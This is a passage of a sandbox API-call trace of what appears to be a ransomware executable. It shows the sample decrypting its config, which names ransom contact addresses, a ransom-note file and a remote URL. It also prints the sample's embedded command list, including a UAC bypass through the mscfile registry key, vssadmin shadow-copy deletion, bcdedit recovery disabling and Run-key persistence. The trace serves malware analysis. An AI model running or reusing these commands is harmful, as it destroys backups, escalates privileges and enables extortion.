(in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0115.510] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0115.511] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0115.511] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0115.572] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0115.578] GetACP () returned 0x4e4 [0115.578] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0115.578] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0115.578] GetTickCount () returned 0x276e3 [0115.578] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=17236765428) returned 1 [0115.578] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x52\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x64\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x67\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x47\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x67\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x37\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x7a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x69\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x38\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x7a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x77\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0115.579] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0115.579] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0115.579] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0115.579] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0115.579] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0115.579] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0115.579] LockResource (hResData=0x50d55c) returned 0x50d55c [0115.579] FreeResource (hResData=0x50d55c) returned 0 [0115.579] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0115.580] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0115.580] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0115.580] LockResource (hResData=0x50d64c) returned 0x50d64c [0115.580] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0115.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1504f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0115.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1504f60, cbMultiByte=38, lpWideCharStr=0x14fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0115.580] FreeResource (hResData=0x50d64c) returned 0 [0115.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1504f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bcd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0115.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bcd18, cbMultiByte=239, lpWideCharStr=0x14c2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.580] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x14b399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0115.580] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x14b399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0115.580] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0115.583] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0115.583] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0115.584] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0115.585] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0115.586] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0115.586] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0115.587] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0115.588] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0115.591] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x149c63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0115.591] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x149c63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0115.591] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x149c63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0115.591] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x149c63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0115.591] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0115.591] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0115.591] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0115.591] LockResource (hResData=0x50d72c) returned 0x50d72c [0115.591] FreeResource (hResData=0x50d72c) returned 0 [0115.591] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0115.591] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0115.591] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0115.591] LockResource (hResData=0x50d64c) returned 0x50d64c [0115.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0115.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505008, cbMultiByte=38, lpWideCharStr=0x14fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0115.591] FreeResource (hResData=0x50d64c) returned 0 [0115.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x150500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0115.591] GetCurrentThreadId () returned 0xdec [0115.591] GetCurrentThreadId () returned 0xdec [0115.591] GetCurrentThreadId () returned 0xdec [0115.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x149e688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0115.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x149e688, cbMultiByte=1410, lpWideCharStr=0x14b9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0115.592] GetCurrentThreadId () returned 0xdec [0115.592] GetCurrentThreadId () returned 0xdec [0115.592] GetCurrentThreadId () returned 0xdec [0115.592] GetCurrentThread () returned 0xfffffffe [0115.592] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0115.592] GetLastError () returned 0x3f0 [0115.592] GetCurrentProcess () returned 0xffffffff [0115.592] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0115.592] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x14b7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x14b7ae0, ReturnLength=0x12fc60) returned 1 [0115.592] CloseHandle (hObject=0xb8) returned 1 [0115.592] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x706438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0115.592] EqualSid (pSid1=0x706438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14b7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0115.593] EqualSid (pSid1=0x706438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 